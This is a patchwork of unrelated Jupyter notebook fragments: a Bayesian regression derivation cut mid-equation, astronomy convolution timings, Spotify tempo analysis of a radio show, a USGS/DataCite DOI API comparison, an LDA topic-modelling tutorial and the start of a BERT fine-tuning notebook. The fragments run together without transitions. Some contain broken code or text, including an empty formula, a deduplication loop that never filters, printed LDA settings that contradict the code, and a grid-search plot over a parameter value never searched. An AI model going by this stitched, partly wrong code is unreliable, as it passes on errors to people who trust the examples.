\boldsymbol{\mu_0}^T\Sigma_0^{-1} + \boldsymbol{\mu_1}^T\Sigma_1^{-1}\\\text{Applying transpose on both sides,}\\\Sigma^{-1}\boldsymbol{\mu} &= \Sigma_0^{-1}\boldsymbol{\mu}_0 + \Sigma_1^{-1}\boldsymbol{\mu}_1\\\boldsymbol{\mu} &= \Sigma\left(\Sigma_0^{-1}\boldsymbol{\mu}_0 + \Sigma_1^{-1}\boldsymbol{\mu}_1\right)\end{align} Now, solving for the normalizing constant $c$, \begin{align}\frac{c}{(2\pi)^{\frac{N}{2}}|\Sigma|^{\frac{1}{2}}} &= \frac{1}{(2\pi)^{\frac{N}{2}}|\Sigma_0|^{\frac{1}{2}}(2\pi)^{\frac{N}{2}}|\Sigma_1|^{\frac{1}{2}}}\\c &= \frac{|\Sigma|^{\frac{1}{2}}}{(2\pi)^{\frac{N}{2}}|\Sigma_0|^{\frac{1}{2}}|\Sigma_1|^{\frac{1}{2}}}\end{align} If we have two Gaussians $\mathcal{N}(\mathbf{a}, A)$ and $\mathcal{N}(\mathbf{b}, B)$ for same random variable $\mathbf{x}$, Marginal likelihood can be given as,$$c = (2\pi)^{-N/2}|A+B|^{-1/2}\exp -\frac{1}{2}\left[(\mathbf{a} - \mathbf{b})^T(A+B)^{-1}(\mathbf{a} - \mathbf{b})\right]$$Here, we have two Gaussians $\mathcal{N}(0, \sigma^2I)$ and $\mathcal{N}((X^TX)^{-1}X^T\mathbf{y}, \frac{(X^TX)^{-1}}{\sigma_n^2} )$ for same random variable $\boldsymbol{\theta}$, Marginal likelihood can be given as,$$$$import numpy as np import matplotlib.pyplot as plt import scipy.stats np.random.seed(0) N = 10 D = 5 sigma_n = 0.1 # noise sigma = 1 # variance in parameters m0 = np.random.rand(D) S0 = np.eye(D)*sigma**2 x = np.random.rand(N,D) theta = np.random.rand(D,1) y = x@theta + 
np.random.multivariate_normal(np.zeros(N), np.eye(N)*sigma_n**2, size=1).T plt.scatter(x[:,0], x[:,1], c=y) x.shape, theta.shape, y.shape a = np.linalg.inv(x.T@x)@x.T@y b = m0.reshape(-1,1) A = np.linalg.inv(x.T@x)/(sigma_n**2) B = S0 A_inv = np.linalg.inv(A) B_inv = np.linalg.inv(B) c_cov = np.linalg.inv(A_inv + B_inv) c_mean = c_cov@(A_inv@a + B_inv@b) a.shape, A.shape, b.shape, B.shape, c_mean.shape, c_cov.shape c_denom = 1/(((2*np.pi)**(D/2))*(np.linalg.det(c_cov)**0.5)) b_denom = 1/(((2*np.pi)**(D/2))*(np.linalg.det(B)**0.5)) a_denom = 1/(((2*np.pi)**(D/2))*(np.linalg.det(A)**0.5)) a_denom, b_denom, c_denom, 1/c_denom normalizer_c = (1/(((2*np.pi)**(D/2))*(np.linalg.det(A+B)**0.5)))*np.exp(-0.5*((a-b).T@np.linalg.inv(A+B)@(a-b))) norm_c_a_given_b = scipy.stats.multivariate_normal.pdf(a.squeeze(), b.squeeze(), A+B) norm_c_b_given_a = scipy.stats.multivariate_normal.pdf(b.squeeze(), a.squeeze(), A+B) normalizer_c, norm_c_a_given_b, norm_c_b_given_a, 1/normalizer_c a_pdf = scipy.stats.multivariate_normal.pdf(theta.squeeze(), a.squeeze(), A) b_pdf = scipy.stats.multivariate_normal.pdf(theta.squeeze(), b.squeeze(), B) c_pdf = scipy.stats.multivariate_normal.pdf(theta.squeeze(), c_mean.squeeze(), c_cov) a_pdf, b_pdf, c_pdf, np.allclose(a_pdf*b_pdf, normalizer_c*c_pdf) K = x@S0@x.T + np.eye(N)*sigma_n**2 marginal_Likelihood_closed_form = scipy.stats.multivariate_normal.pdf(y.squeeze(), (x@m0).squeeze(), K) marginal_Likelihood_closed_form, 1/normalizer_c from sklearn.model_selection import KFold from sklearn.linear_model import LinearRegression splitter = KFold(n_splits=5) # n_splits must not exceed the number of samples (here N=10) for train_ind, test_ind in splitter.split(x): train_x, train_y = x[train_ind], y[train_ind] test_x, test_y = x[test_ind], y[test_ind] model = LinearRegression() model.fit(train_x, train_y)Convolution speed tests This notebook compares the convolution speeds of Eniric to PyAstronomy. Eniric's rotational convolution is faster than PyAstronomy's "slow" convolution but significantly slower than PyAstronomy's "fast" convolutions, which use a fixed kernel (valid only for a small wavelength range) and require a uniform wavelength step.Eniric allows a variable-step wavelength array, with a unique kernel for each pixel (hence the longer time).Recalling a cached result is faster than PyAstronomy's convolutions.Requires PyAstronomy`pip install PyAstronomy`import matplotlib.pyplot as plt import numpy as np import PyAstronomy.pyasl as pyasl import eniric from eniric import config from eniric.broaden import rotational_convolution, resolution_convolution from eniric.utilities import band_limits, load_aces_spectrum, wav_selector from scripts.phoenix_precision import convolve_and_resample # config.cache["location"] = None # Disable caching for these tests config.cache["location"] = ".joblib" # Enable cachingLoad dataSelect test spectra: flux1 is an M0 spectrum, flux2 is an M9 spectrum.wav1, flux1 = load_aces_spectrum([3900, 4.5, 0.0, 0]) # wav2, flux2 = load_aces_spectrum([2600, 4.5, 0.0, 0]) wav1, flux1 = wav_selector(wav1, flux1, *band_limits("K")) # wav2, flux2 = wav_selector(wav2, flux2, *band_limits("K")) # PyAstronomy requires evenly spaced wavelengths (eniric does not) wav = np.linspace(wav1[0], wav1[-1], len(wav1)) flux1 = np.interp(wav, wav1, flux1) #flux2 = np.interp(wav, wav2, flux2) # Convolution settings epsilon = 0.6 vsini = 10.0 R = 40000Timing ConvolutionsTimes vary due to system hardware performance.
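Because a single `%%time` measurement is noisy, a small sketch (not part of the original notebook) using `timeit` can give more stable numbers; it assumes the `wav`, `flux1`, `epsilon` and `vsini` values defined above are in scope:

```python
import timeit

def best_time(fn, repeat=3):
    """Best wall time in seconds over `repeat` single calls of a zero-argument callable."""
    return min(timeit.repeat(fn, repeat=repeat, number=1))

t_pya_fast = best_time(lambda: pyasl.fastRotBroad(wav, flux1, epsilon, vsini))
t_eniric = best_time(lambda: rotational_convolution(wav, wav, flux1, vsini, epsilon=epsilon))
print("fastRotBroad: {:.4f} s, eniric rotational_convolution: {:.4f} s".format(t_pya_fast, t_eniric))
```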
Rotational convolution%%time rot_fast = pyasl.fastRotBroad(wav, flux1, epsilon, vsini) ## Wall time: 15.2 ms %%time rot_slow = pyasl.rotBroad(wav, flux1, epsilon, vsini) ## Wall time: 36 s # Convolution settings epsilon = 0.6 vsini = 10.0 R = 40000 %%time # After caching eniric_rot = rotational_convolution(wav, wav, flux1, vsini, epsilon=epsilon) ## Wall time: 4.2 msWall time: 62.5 msThe rotational convolution in eniric is ~10x faster than the precise version in PyAstronomy and does not require equal wavelength steps. It is ~1000x slower than the fast rotational convolution, which uses a fixed kernel and is only valid for short regions. Resolution convolution%%time res_fast = pyasl.instrBroadGaussFast(wav, flux1, R, maxsig=5) ## Wall time: 19.2 ms %%time # Before caching eniric_res = resolution_convolution( wavelength=wav, extended_wav=wav, extended_flux=flux1, R=R, fwhm_lim=5, num_procs=4, normalize=True, ) ## Wall time: 3.07 s %%time # Same calculation with cached result. eniric_res = resolution_convolution( wavelength=wav, extended_wav=wav, extended_flux=flux1, R=R, fwhm_lim=5, normalize=True, ) ## Wall time: 8.9 msWall time: 46.8 msResolution convolution in eniric is around 500x slower than PyAstronomy's fast version, although it can handle uneven wavelength spacing and has a variable kernel. Compare the results of convolutionEniric gives a comparable rotational convolution to PyAstronomy's slow version. The PyAstronomy Fast convolution gives different results, which are largest at the edges. PyAstronomy also has edge effects, which are ignored using [10:-10] slicing.plt.plot(wav, flux1, label="Original Flux") plt.plot(wav[100:-100], eniric_res[100:-100], "-.", label="Eniric") plt.plot(wav[100:-100], res_fast[100:-100], "--", label="PyAstronomy Fast") plt.xlim([2.116, 2.118]) plt.xlabel("wavelength") plt.title("Resolution convolution R={}".format(R)) plt.legend() plt.show() plt.plot(wav, flux1, label="Original") plt.plot(wav, rot_fast, ":", label="PyAstronomy Fast") plt.plot(wav, rot_slow, "--", label="PyAstronomy Slow") plt.plot(wav, eniric_rot, "-.", label="Eniric") plt.xlabel("Wavelength") plt.title("Rotational Convolution vsini={}".format(vsini)) plt.xlim((2.116, 2.118)) plt.legend() plt.show() plt.plot( wav[100:-100], (eniric_rot[100:-100] - rot_fast[100:-100]) / eniric_rot[100:-100], label="Eniric - PyA Fast", ) plt.plot( wav[100:-100], (eniric_rot[100:-100] - rot_slow[100:-100]) / eniric_rot[100:-100], "--", label="Eniric - PyA Slow", ) plt.xlabel("Wavelength") plt.ylabel("Fractional difference") plt.title("Rotational Convolution Differences") # plt.xlim((2.3, 2.31)) plt.legend() plt.show() plt.plot( wav[50:-50], (eniric_rot[50:-50] - rot_slow[50:-50]) / eniric_rot[50:-50], "--", label="Eniric - PyA Slow", ) plt.xlabel("Wavelength") plt.ylabel("Fractional difference") plt.title("Rotational Convolution Differences") plt.legend() plt.show() assert np.allclose(eniric_rot[50:-50], rot_slow[50:-50])PyAstronomy slow and eniric are identical (within 1e-13%) (except for edge effects).
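The size of these differences can be checked numerically; a quick sketch (assuming the `eniric_rot`, `rot_slow` and `rot_fast` arrays computed above) reports the maximum relative deviation away from the edges:

```python
import numpy as np

core = slice(100, -100)  # ignore edge effects
rel_slow = np.max(np.abs((eniric_rot[core] - rot_slow[core]) / eniric_rot[core]))
rel_fast = np.max(np.abs((eniric_rot[core] - rot_fast[core]) / eniric_rot[core]))
print("max relative difference vs PyAstronomy slow: {:.2e}".format(rel_slow))
print("max relative difference vs PyAstronomy fast: {:.2e}".format(rel_fast))
```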
PyAstronomy Fast and eniric are different by up to 1.5%plt.plot( wav[100:-100], (eniric_res[100:-100] - res_fast[100:-100]) / eniric_res[100:-100], label="(Eniric-PyA Fast)/Eniric", ) plt.xlabel("Wavelength") plt.ylabel("Fractional difference") plt.title("Resolution Convolution Differences, R={}".format(R)) # plt.xlim((2.3, 2.31)) plt.legend() plt.show()Methodology> Explorations and explanations.- toc: false - badges: true- comments: false- categories: [asot, bpm]- image: images/methodology.png#hide import os import yaml import spotipy import json from spotipy.oauth2 import SpotifyClientCredentials with open('spotipy_credentials.yaml', 'r') as spotipy_credentials_file: credentials = yaml.safe_load(spotipy_credentials_file) os.environ["SPOTIPY_CLIENT_ID"] = credentials['spotipy_credentials']['spotipy_client_id'] os.environ["SPOTIPY_CLIENT_SECRET"] = credentials['spotipy_credentials']['spotipi_client_seret'] sp = spotipy.Spotify(client_credentials_manager=SpotifyClientCredentials())The Spotify Web API can return over a dozen [audio features for a track](https://developer.spotify.com/documentation/web-api/reference/tracks/get-audio-features/), notably `tempo` - "The overall estimated tempo of a track in beats per minute (BPM)."Given a Spotify ID, [Spotipy's `audio_features` method](https://spotipy.readthedocs.io/en/latest/?highlight=audio_featuresspotipy.client.Spotify.audio_features) can be called as follows:
Let's take a quick look..# Print the names of the first 10 episodes for album in albums[:10]: print(album['name'])A State Of Trance Episode 001 A State Of Trance Episode 003 A State Of Trance Episode 004 A State Of Trance Episode 005 A State Of Trance Episode 007 A State Of Trance Episode 008 A State Of Trance Episode 009 A State Of Trance Episode 010 A State Of Trance Episode 012 A State Of Trance Episode 015Hm, aren't we missing a few?# How many episodes? len(albums)For some reason 25 early episodes are classified as "Singles and EPs". Let's grab those as well, and add them to the list.""" Artist: ASOT Radio Artist link: https://open.spotify.com/artist/25mFVpuABa9GkGcj9eOPce Artist ID: 25mFVpuABa9GkGcj9eOPce """ asot_radio_id = '25mFVpuABa9GkGcj9eOPce' singles = [] results = sp.artist_albums(asot_radio_id, album_type='single') singles.extend(results['items']) while results['next']: results = sp.next(results) singles.extend(results['items']) seen = set() # to avoid dups for single in singles: name = single['name'] if name not in seen: seen.add(name) episodes = singles + albums episodes.sort(key=lambda x: x['release_date']) # Sort by release date for episode in episodes[:10]: print(episode['name'])A State Of Trance Episode 000 A State Of Trance Episode 001 A State Of Trance Episode 002 A State Of Trance Episode 003 A State Of Trance Episode 004 A State Of Trance Episode 005 A State Of Trance Episode 006 A State Of Trance Episode 007 A State Of Trance Episode 008 A State Of Trance Episode 009Nice!# Now how many episodes? len(episodes)Great, that's every available episode as of writing. Let's see what we can do with all this, starting with a tracklist courtesy of [Spotipy's `album_tracks` method](https://spotipy.readthedocs.io/en/latest/?highlight=audio_featuresspotipy.client.Spotify.album_tracks):# Print every available Artist - Track from ASOT 001 for track in sp.album_tracks(episodes[1]['uri'])['items']: print(track['artists'][0]['name'], '-', track['name']) - A State Of Trance [ASOT 001] - Intro Liquid DJ Team - Liquidation [ASOT 001] - Marco V Mix The Ultimate Seduction - The Ultimate Seduction [ASOT 001] **ASOT Radio Classic** - Original Mix System F - Exhale [ASOT 001] - Ferry Corsten & New Mix Rising Star - Clear Blue Moon [ASOT 001] - Original Mix Ralphie B - Massive [ASOT 001] - Original Mix Rank 1 - Such is Life [ASOT 001] - Original Mix - Blue Fear [ASOT 001] - Original Mix - A State Of Trance [ASOT 001] - OutroSeems most of the early episodes are missing a bunch of tracks unfortunately, [A State of Trance's website reports twice as many tracks in this episode](http://www.astateoftrance.com/episodes/episode-001/) and we'll want to remove the intro and outro as well.Looking at a more recent episode:# Print every available Artist - Track from ASOT 950 - Part 2 for track in sp.album_tracks(episodes[945]['uri'])['items']: track_artist = track['artists'][0]['name'] for artist in track['artists'][1:]: track_artist += " & " + artist['name'] print(track_artist, '-', track['name']) - A State Of Trance (ASOT 950 - Part 1) - Intro - Let The Music Guide You (ASOT 950 Anthem) [ASOT 950 - Part 1] - A State Of Trance (ASOT 950 - Part 1) - Coming Up, Pt. 1 - A State Of Trance (ASOT 950 - Part 1) - Service For Dreamers Special, Pt. 1 - A State Of Trance (ASOT 950 - Part 1) - ASOT 950 Event, Pt. 1 - A State Of Trance (ASOT 950 - Part 1) - Requested by & from Canada, Pt. 1 - A State Of Trance (ASOT 950 - Part 1) - Requested by & from Canada, Pt. 
2 Tritonal & Jeza - I Can Breathe (ASOT 950 - Part 1) - Tritonal Club Mix - A State Of Trance (ASOT 950 - Part 1) - Requested by from Romania Super8 & Tab - Nino (ASOT 950 - Part 1) - A State Of Trance (ASOT 950 - Part 1) - Requested by from Portugal & & Underworld & Ar[...]The more recent episodes feature a Spotify exclusive - voiceover interludes! Seems they all contain "A State of Trance" though, same with the regular intros and outros.Without them:# Print every available Artist - Track from ASOT 950 - Part 2 (actual songs only) episode_tracks = sp.album_tracks(episodes[945]['uri'])['items'] pruned_tracks = [] for track in episode_tracks: if "a state of trance" in track['name'].lower() or "- interview" in track['name'].lower(): continue else: pruned_tracks.append(track) track_artist = track['artists'][0]['name'] for artist in track['artists'][1:]: track_artist += " & " + artist['name'] print(track_artist, '-', track['name']) - Let The Music Guide You (ASOT 950 Anthem) [ASOT 950 - Part 1] Tritonal & Jeza - I Can Breathe (ASOT 950 - Part 1) - Tritonal Club Mix Super8 & Tab - Nino (ASOT 950 - Part 1) & & Underworld & - Downpipe (ASOT 950 - Part 1) - Remix - Chordplay (ASOT 950 - Part 1) & & & - In And Out Of Love (ASOT 950 - Part 1) - ilan Bluestone & Assaf & - All Of You (ASOT 950 - Part 1) & - Made Of Love (ASOT 950 - Part 1) Eco - A Million Sounds, A Thousand Smiles (ASOT 950 - Part 1) Dennis Sheperd & Cold Blue & Ana Criado - Fallen Angel (ASOT 950 - Part 1) - Dennis Sheperd Club Mix Omnia & Everything By Electricity - Bones (ASOT 950 - Part 1) - The Train (ASOT 950 - Part 1) & Shapov - The Last Dancer (ASOT 950 - Part 1) HALIENE & - Dream In Color (ASOT 95[...]Much better! Finally, for fun, let's track this episode's BPM over time using some visualization libraries:import altair as alt import numpy as np import pandas as pd bpm = [] for track in pruned_tracks: bpm.append(sp.audio_features(track['uri'])[0]['tempo']) x = np.arange(len(pruned_tracks)) source = pd.DataFrame({ 'track': x, 'bpm': np.array(bpm) }) alt.Chart(source).mark_line().encode( alt.X('track'), alt.Y('bpm', scale=alt.Scale(domain=(120, 150))), ).properties( title="ASOT 950 Part 2 - BPM of track" )Exploration Notebook to Compare USGS DOI Tool API to DataCite APIPlease be sure to review the other notebook in the GitHub repo before working with this notebook.# https://support.datacite.org/docs/api-queries import requests import json import pprint # Queries by default search all fields, but a specific field can be provided in the query. 
data_cite_query = requests.get('https://api.datacite.org/dois?query=10.5066') json_data = json.loads(data_cite_query.text) for iDOI in json_data['data']: pprint.pprint(iDOI) data_cite_query = requests.get('https://api.datacite.org/dois?provider-id=usgs') data_cite_query.text Compare response from DataCite to USGS DOI tool DataCite API # Not case sensitive; note the available fields datacite_query = requests.get('https://api.datacite.org/dois?query=10.5066/p9vrv6us') datacite_json = json.loads(datacite_query.text) datacite_json['data'][0] x = datacite_json['data'][0] x.keys() x = datacite_json['data'][0]['attributes'] for key in x: print (key)doi identifiers creators titles publisher container publicationYear subjects contributors dates language types relatedIdentifiers sizes formats version rightsList descriptions geoLocations fundingReferences url contentUrl metadataVersion schemaVersion source isActive state reason created registered published updated USGS Data Tools DOI API import getpass from usgs_datatools import doi #DoiSession = doi.DoiSession(env='production') # Production #DoiSession = doi.DoiSession(env='staging') # Staging #*Note: User must be on the USGS network or VPN to successfully use the staging environment.* DoiSession = doi.DoiSession(env='production') username = 'dignizio' password = getpass.getpass('USGS AD Password: ') print('*Complete*') DoiSession.doi_authenticate(username, password) print ("Successfully authenticated.") # Note the raw URL being accessed under the hood by the function. # This is worth noting when comparing to the documentation for the REST endpoint. # ('https://www1.usgs.gov/csas/dmapi/doi/doi:10.5066/P9VRV6US') # Endpoint appears to be case sensitive. Uses 'doi' + colon. usgs_doi = DoiSession.get_doi('doi:10.5066/F7W0944J') usgs_doi for field in usgs_doi.keys(): print (field)doi title pubDate url resourceType date dateType description subject username status noDataReleaseAvailableReason noPublicationIdAvailable dataSourceId dataSourceName linkCheckingStatus formatTypes authors users relatedIdentifiers ipdsNumbers created modified LDA Tutorial Taken from https://www.machinelearningplus.com/nlp/topic-modeling-python-sklearn-examples/ import numpy as np import pandas as pd import re, nltk, spacy, gensim from sklearn.decomposition import LatentDirichletAllocation,TruncatedSVD from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer from sklearn.model_selection import GridSearchCV from pprint import pprint import pyLDAvis import pyLDAvis.sklearn import matplotlib.pyplot as plt %matplotlib inline # Import Dataset 20-Newsgroups Dataset df = pd.read_json('https://raw.githubusercontent.com/selva86/datasets/master/newsgroups.json') print(df.target_names.unique()) df.head() ## Remove emails and newline characters data = df.content.values.tolist() # Remove Emails data = [re.sub('[\w.-]+@[\w.-]+.\w+', '', sent) for sent in data] # Remove new line characters data = [re.sub('\n+', ' ', sent) for sent in data] # Remove distracting single quotes data = [re.sub("\'", "", sent) for sent in data] pprint(data[:1]) ## deacc=True removes punctuation def sen_to_word(sentences): for sentence in sentences: yield(gensim.utils.simple_preprocess(str(sentence), deacc=True)) data_words = list(sen_to_word(data)) print(data_words[:1]) def lemmatization(texts, allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV']): """https://spacy.io/api/annotation""" texts_out = [] for sent in texts: doc = nlp(" ".join(sent)) texts_out.append(" ".join([token.lemma_ if token.lemma_ not in ['-PRON-'] else '' for token in
doc if token.pos_ in allowed_postags])) return texts_out # Initialize spacy 'en' model, keeping only tagger component (for efficiency) # Run in terminal: python3 -m spacy download en nlp = spacy.load('en', disable=['parser', 'ner']) # Do lemmatization keeping only Noun, Adj, Verb, Adverb data_lemmatized = lemmatization(data_words, allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV']) print(data_lemmatized[:2]) vectorizer = CountVectorizer(analyzer='word', min_df=10, # minimum reqd occurences of a word stop_words='english', # remove stop words lowercase=True, # convert all words to lowercase token_pattern='[a-zA-Z0-9]{3,}', # num chars > 3 # max_features=50000, # max number of uniq words ) data_vectorized = vectorizer.fit_transform(data_lemmatized) # Materialize the sparse data data_dense = data_vectorized.todense() # Compute Sparsicity = Percentage of Non-Zero cells print("Sparsicity: ", ((data_dense > 0).sum()/data_dense.size)*100, "%") # Build LDA Model lda_model = LatentDirichletAllocation(n_components=20, # Number of components max_iter=10, # Max learning iterations learning_method='batch', random_state=100, # Random state batch_size=128, # n docs in each learning iter evaluate_every = -1, # compute perplexity every n iters, default: Don't n_jobs = -1, # Use all available CPUs ) lda_output = lda_model.fit_transform(data_vectorized) print(lda_model) # Model attributes # Log Likelyhood: Higher the better print("Log Likelihood: ", lda_model.score(data_vectorized)) # Perplexity: Lower the better. Perplexity = exp(-1. * log-likelihood per word) print("Perplexity: ", lda_model.perplexity(data_vectorized)) # See model parameters pprint(lda_model.get_params())Log Likelihood: -9966052.223646708 Perplexity: 2040.6879775616724 {'batch_size': 128, 'doc_topic_prior': None, 'evaluate_every': -1, 'learning_decay': 0.7, 'learning_method': 'online', 'learning_offset': 10.0, 'max_doc_update_iter': 100, 'max_iter': 10, 'mean_change_tol': 0.001, 'n_components': 20, 'n_jobs': -1, 'n_topics': None, 'perp_tol': 0.1, 'random_state': 100, 'topic_word_prior': None, 'total_samples': 1000000.0, 'verbose': 0}Grid Search to Optimize ParametersThe most important tuning parameter for LDA models is n_components (number of topics).Besides these, other possible search params could be learning_offset (downweigh early iterations. 
Should be > 1) and max_iter.# Define Search Param #search_params = {'n_components': [10, 15, 20, 25, 30], 'learning_decay': [.5, .7, .9], 'max_iter': [5, 10, 15]} search_params = {'n_components': [10, 15, 20], 'learning_decay': [.7, .9]} # Init the Model lda = LatentDirichletAllocation() # Init Grid Search Class model = GridSearchCV(lda, param_grid=search_params) # Do the Grid Search model.fit(data_vectorized) # Best Model best_lda_model = model.best_estimator_ # Model Parameters print("Best Model's Params: ", model.best_params_) # Log Likelihood Score print("Best Log Likelihood Score: ", model.best_score_) # Perplexity print("Model Perplexity: ", best_lda_model.perplexity(data_vectorized)) # Get Log Likelyhoods from Grid Search Output n_topics = [10, 15, 20] log_likelyhoods_5 = [round(gscore.mean_validation_score) for gscore in model.grid_scores_ if gscore.parameters['learning_decay']==0.5] log_likelyhoods_7 = [round(gscore.mean_validation_score) for gscore in model.grid_scores_ if gscore.parameters['learning_decay']==0.7] log_likelyhoods_9 = [round(gscore.mean_validation_score) for gscore in model.grid_scores_ if gscore.parameters['learning_decay']==0.9] # Show graph plt.figure(figsize=(12, 8)) plt.plot(n_topics, log_likelyhoods_5, label='0.5') plt.plot(n_topics, log_likelyhoods_7, label='0.7') plt.plot(n_topics, log_likelyhoods_9, label='0.9') plt.title("Choosing Optimal LDA Model") plt.xlabel("Num Topics") plt.ylabel("Log Likelyhood Scores") plt.legend(title='Learning decay', loc='best') plt.show() # Create Document - Topic Matrix lda_output = best_lda_model.transform(data_vectorized) # column names topicnames = ["Topic" + str(i) for i in range(best_lda_model.n_topics)] # index names docnames = ["Doc" + str(i) for i in range(len(data))] # Make the pandas dataframe df_document_topic = pd.DataFrame(np.round(lda_output, 2), columns=topicnames, index=docnames) # Get dominant topic for each document dominant_topic = np.argmax(df_document_topic.values, axis=1) df_document_topic['dominant_topic'] = dominant_topic # Styling def color_green(val): color = 'green' if val > .1 else 'black' return 'color: {col}'.format(col=color) def make_bold(val): weight = 700 if val > .1 else 400 return 'font-weight: {weight}'.format(weight=weight) # Apply Style df_document_topics = df_document_topic.head(15).style.applymap(color_green).applymap(make_bold) df_document_topics df_topic_distribution = df_document_topic['dominant_topic'].value_counts().reset_index(name="Num Documents") df_topic_distribution.columns = ['Topic Num', 'Num Documents'] df_topic_distribution pyLDAvis.enable_notebook() panel = pyLDAvis.sklearn.prepare(best_lda_model, data_vectorized, vectorizer, mds='tsne') panel # Topic-Keyword Matrix df_topic_keywords = pd.DataFrame(best_lda_model.components_) # Assign Column and Index df_topic_keywords.columns = vectorizer.get_feature_names() df_topic_keywords.index = topicnames # View df_topic_keywords.head() # Show top n keywords for each topic def show_topics(vectorizer=vectorizer, lda_model=lda_model, n_words=20): keywords = np.array(vectorizer.get_feature_names()) topic_keywords = [] for topic_weights in lda_model.components_: top_keyword_locs = (-topic_weights).argsort()[:n_words] topic_keywords.append(keywords.take(top_keyword_locs)) return topic_keywords topic_keywords = show_topics(vectorizer=vectorizer, lda_model=best_lda_model, n_words=15) # Topic - Keywords Dataframe df_topic_keywords = pd.DataFrame(topic_keywords) df_topic_keywords.columns = ['Word '+str(i) for i in 
range(df_topic_keywords.shape[1])] df_topic_keywords.index = ['Topic '+str(i) for i in range(df_topic_keywords.shape[0])] df_topic_keywords # Define function to predict topic for a given text document. nlp = spacy.load('en', disable=['parser', 'ner']) def predict_topic(text, nlp=nlp): global sen_to_word global lemmatization # Step 1: Clean with simple_preprocess mytext_2 = list(sen_to_word(text)) # Step 2: Lemmatize mytext_3 = lemmatization(mytext_2, allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV']) # Step 3: Vectorize transform mytext_4 = vectorizer.transform(mytext_3) # Step 4: LDA Transform topic_probability_scores = best_lda_model.transform(mytext_4) topic = df_topic_keywords.iloc[np.argmax(topic_probability_scores), :].values.tolist() return topic, topic_probability_scores # Predict the topic mytext = ["Some text about christianity and bible"] topic, prob_scores = predict_topic(text = mytext) print(topic) # Construct the k-means clusters from sklearn.cluster import KMeans clusters = KMeans(n_clusters=15, random_state=100).fit_predict(lda_output) # Build the Singular Value Decomposition (SVD) model svd_model = TruncatedSVD(n_components=2) # 2 components lda_output_svd = svd_model.fit_transform(lda_output) # X and Y axes of the plot using SVD decomposition x = lda_output_svd[:, 0] y = lda_output_svd[:, 1] # Weights for the 15 columns of lda_output, for each component print("Component's weights: \n", np.round(svd_model.components_, 2)) # Percentage of total information in 'lda_output' explained by the two components print("Perc of Variance Explained: \n", np.round(svd_model.explained_variance_ratio_, 2)) # Plot plt.figure(figsize=(12, 12)) plt.scatter(x, y, c=clusters) plt.ylabel('Component 2') plt.xlabel('Component 1') plt.title("Segregation of Topic Clusters") from sklearn.metrics.pairwise import euclidean_distances nlp = spacy.load('en', disable=['parser', 'ner']) def similar_documents(text, doc_topic_probs, documents = data, nlp=nlp, top_n=5, verbose=False): topic, x = predict_topic(text) dists = euclidean_distances(x.reshape(1, -1), doc_topic_probs)[0] doc_ids = np.argsort(dists)[:top_n] if verbose: print("Topic KeyWords: ", topic) print("Topic Prob Scores of text: ", np.round(x, 1)) print("Most Similar Doc's Probs: ", np.round(doc_topic_probs[doc_ids], 1)) return doc_ids, np.take(documents, doc_ids) # Get similar documents mytext = ["Some text about christianity and bible"] doc_ids, docs = similar_documents(text=mytext, doc_topic_probs=lda_output, documents = data, top_n=1, verbose=True) print('\n', docs[0][:500]) Mechanics of TensorFlow ```{admonition} Attribution This notebook follows Chapter 14: *Going Deeper – The Mechanics of TensorFlow* of {cite}`RaschkaMirjalili2019`.```import tensorflow as tf print(tf.__version__) print(tf.config.list_physical_devices('GPU'))2.7.0 [PhysicalDevice(name='/physical_device:GPU:0', device_type='GPU')] Fine-tune BERT & RoBERTa for Aspect Category Detection in PyTorch Using Hugging Face The code was adapted and modified for this task from the work of [](https://github.com/gmihaila). Source code: https://gmihaila.medium.com/fine-tune-transformers-in-pytorch-using-transformers-57b40450635 Info This notebook is designed to use a pretrained BERT or RoBERTa model and fine-tune it on an Aspect Category Detection task.
All the instructions on the setups used can be found on "*Chapter 4: Classification Method* " of the thesis report.This notebook is using the [AutoClasses](https://huggingface.co/transformers/model_doc/auto.html) from [transformer](https://github.com/huggingface/transformers) by [Hugging Face](https://huggingface.co/) functionality. This functionality can guess a model's configuration, tokenizer and architecture just by passing in the model's name. This allows us to reuse the code on a large number of transformers models. How to use this notebook? This notebook was built with reusability in mind. The way I load the dataset into the PyTorch class is pretty standard and can be easily reused for any other dataset.The only modifications needed to use your own dataset will be in reading in the dataset inside the PyTorch **Dataset** class under **Dataset and DataLoader** tab. The **DataLoader** will return a dictionary of batch inputs format so that it can be fed straight to the model using the statement: `outputs = model(**batch)`. *As long as this statement holds, the rest of the code will work.*Basic parameters are defined under the **Imports** tab:* `epochs` - will be used as the number of epochs to train the model. * `batch_size` - will be used as the batch size during training. The larger the batch the more RAM / GPU memory it will take. * `max_length` - I use this variable if I want to truncate text inputs to a shorter length than the maximum allowed word piece tokens sequence length. The shorter the sequence the faster it will train.* `model_name_or_path` - This is where I put the transformer model I want to train. In this work, I used `bert-base-uncased` and `roberta-base`.* `labels_ids` - It is mostly the case that labels have a name / meaning. We need to associate each name / meaning with a number / id. I use this variable to create a dictionary that maps labels names to ids. This will be used later inside the PyTorch Dataset class. DatasetThis notebook will cover the fine-tuning of BERT & RoBERTa for Aspect Based Sentiment Analysis. The Dataset used for this finetuning step is the in-house annotated airline customer feedbacks set. For this notebook, only the Aspect Category will be considered. ImportsImport all needed libraries for this notebook.import torch from tqdm.notebook import tqdm from torch.utils.data import Dataset, DataLoader from utils import plot_dict, plot_confusion_matrix from sklearn.metrics import classification_report, accuracy_score from transformers import (AutoConfig, AutoModelForSequenceClassification, AutoTokenizer, AdamW, get_linear_schedule_with_warmup, set_seed, ) import pandas as pd from datetime import datetimeDeclare parameters used for this notebook:# Set seed for reproducibility, set_seed(123) # Number of training epochs epochs = 4 # Number of batch_size - depending on the max sequence length and GPU memory. batch_size = 64 #32 (using 64 returns 32 batch size) # Padd or truncate text sequences to a specific length # if `None` it will use maximum sequence allowed by model. max_length = 124 # Look for gpu to use. Will use `cpu` by default if no gpu found. device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') # Name of transformers model - will use already pretrained model. # Path of transformer model - will load your own model from local disk. model_name_or_path = 'roberta-base' # For this work I used 'roberta-base' and 'bert-base-uncased' # Dicitonary of labels and their id - this will be used to convert. # String labels to number. 
